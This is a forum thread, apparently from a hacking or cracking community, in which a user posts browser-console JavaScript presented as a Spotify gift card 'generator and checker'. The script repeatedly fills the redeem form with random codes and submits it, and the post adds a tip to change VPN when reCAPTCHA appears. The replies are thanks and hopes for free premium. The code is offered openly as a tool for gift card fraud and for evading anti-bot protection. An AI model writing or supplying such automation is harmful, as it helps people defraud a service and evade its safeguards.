Sign in to follow this  
AZ!X

[source] SPOTIFY GIFT CARD CHECKER AND GENERATOR

Recommended Posts

  1. [hide] Go to https://www.spotify.com/us/redeem/
  2. Sign in.
  3. Press ctrl+shift+j (to open console).
  4. Paste the following code in and click enter.
  5. Follow the prompts and begin generating+checking!

var speed = prompt("Speed of checker/gen (Recommended 500 for fast pcs, 1000 for slow)")
var zip = prompt("Zipcode (leave blank for default)") + "10008"
function generateCode() {
 var code = "";
 var chars = "0123456789"; 
 for (var i = 0; i < 19; i++)
   code += chars.charAt(Math.floor(Math.random() * chars.length));
 return code;
}
function main() {   
   document.getElementById("redeem_code_token").value = generateCode();
   document.getElementById("redeem_code_zip-code").value = zip;
   document.getElementById("redeem_code_submit").click();
}

setInterval(function() {
   main();
}, speed);

 

NOTE: If there is no "zip code" section, please use the code below.

 

var speed = prompt("Speed of checker/gen (Recommended 500 for fast pcs, 1000 for slow)")
function generateCode() {
 var code = "";
 var chars = "0123456789"; 
 for (var i = 0; i < 19; i++)
   code += chars.charAt(Math.floor(Math.random() * chars.length));
 return code;
}
function main() {   
   document.getElementById("redeem_code_token").value = generateCode();
   document.getElementById("redeem_code_submit").click();
}

setInterval(function() {
   main();
}, speed); 

 

If you see recaptcha try changing your vpn/etc[/hide]

 

wvmItPB.gif

 

Don't Forget To Press That LIKE Button

 

Donate:14CKotezgMBavbuafJ5Rmwa8HuPVe4NV2t

Share this post


Link to post
Share on other sites

amazing work man, thanks!

upvoted ofc

Share this post


Link to post
Share on other sites

 

 

wvmItPB.gif

 

 

Don't Forget To Press That LIKE Button

[*]

 

Donate:14CKotezgMBavbuafJ5Rmwa8HuPVe4NV2t

 

[*]

shiit ho[e this works

Share this post


Link to post
Share on other sites

this would be awesome if it works :D

Share this post


Link to post
Share on other sites

thank for this man

Share this post


Link to post
Share on other sites

i7t6ttirfrtrt5f6juzdrjutzrdtdrtdtrhtfjzguhijok

Share this post


Link to post
Share on other sites

Upvote good job thanks !

Share this post


Link to post
Share on other sites

muito obrigado, oq eu já testei nunca funcionaram

Share this post


Link to post
Share on other sites

 

 

wvmItPB.gif

 

 

Don't Forget To Press That LIKE Button

[*]

 

Donate:14CKotezgMBavbuafJ5Rmwa8HuPVe4NV2t

 

[*]

appreciate it

Share this post


Link to post
Share on other sites

Lets see this thing!

Share this post


Link to post
Share on other sites

has anyone actually seen if working?

Share this post


Link to post
Share on other sites

I will check this source code thanks

Share this post


Link to post
Share on other sites

 

 

wvmItPB.gif

 

 

Don't Forget To Press That LIKE Button

[*]

 

Donate:14CKotezgMBavbuafJ5Rmwa8HuPVe4NV2t

 

[*]

:kek:  free spotify premium 10/10

Share this post


Link to post
Share on other sites

 

 

wvmItPB.gif

 

 

Don't Forget To Press That LIKE Button

[*]

 

Donate:14CKotezgMBavbuafJ5Rmwa8HuPVe4NV2t

 

[*]

amazing work man, thanks!

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this